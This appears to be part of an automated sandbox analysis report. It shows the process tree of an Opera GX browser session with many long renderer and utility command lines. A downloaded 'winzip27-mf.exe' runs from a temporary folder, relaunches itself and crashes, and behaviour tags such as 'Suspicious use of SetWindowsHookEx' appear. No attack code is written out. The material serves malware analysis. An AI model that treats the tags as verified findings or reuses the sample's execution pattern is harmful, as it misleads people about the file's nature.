C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=148 --field-trial-handle=9352,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7012 /prefetch:12⤵PID:7272
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=149 --field-trial-handle=8652,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3300 /prefetch:12⤵PID:2576
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=150 --field-trial-handle=7900,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3684 /prefetch:12⤵PID:5148
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=151 --field-trial-handle=5512,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9684 /prefetch:12⤵PID:5424
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=152 --field-trial-handle=5320,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10368 /prefetch:12⤵
- Checks computer location settings
PID:6828
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=153 --field-trial-handle=10116,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6008 /prefetch:12⤵PID:6740
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=154 --field-trial-handle=10168,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9536 /prefetch:12⤵PID:7656
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=155 --field-trial-handle=7608,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7012 /prefetch:12⤵PID:6276
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=156 --field-trial-handle=6492,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6376 /prefetch:12⤵PID:3316
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=157 --field-trial-handle=6520,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5152 /prefetch:12⤵PID:5788
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=158 --field-trial-handle=3744,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9648 /prefetch:12⤵PID:4304
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=159 --field-trial-handle=10656,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6816 /prefetch:12⤵PID:7688
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=5448,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10452 /prefetch:82⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6612
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8616,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10048 /prefetch:82⤵PID:5736
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8008,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9496 /prefetch:82⤵PID:5064
-
-
C:\Program Files\scoped_dir5888_362405918\winzip27-mf.exe"C:\Program Files\scoped_dir5888_362405918\winzip27-mf.exe"2⤵PID:7512
-
C:\Users\Admin\AppData\Local\Temp\e5e4535\winzip27-mf.exerun=1 shortcut="C:\Program Files\scoped_dir5888_362405918\winzip27-mf.exe"3⤵PID:6856
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 18124⤵
- Program crash
PID:7684
-
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=10756,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10152 /prefetch:82⤵PID:7544
-
-
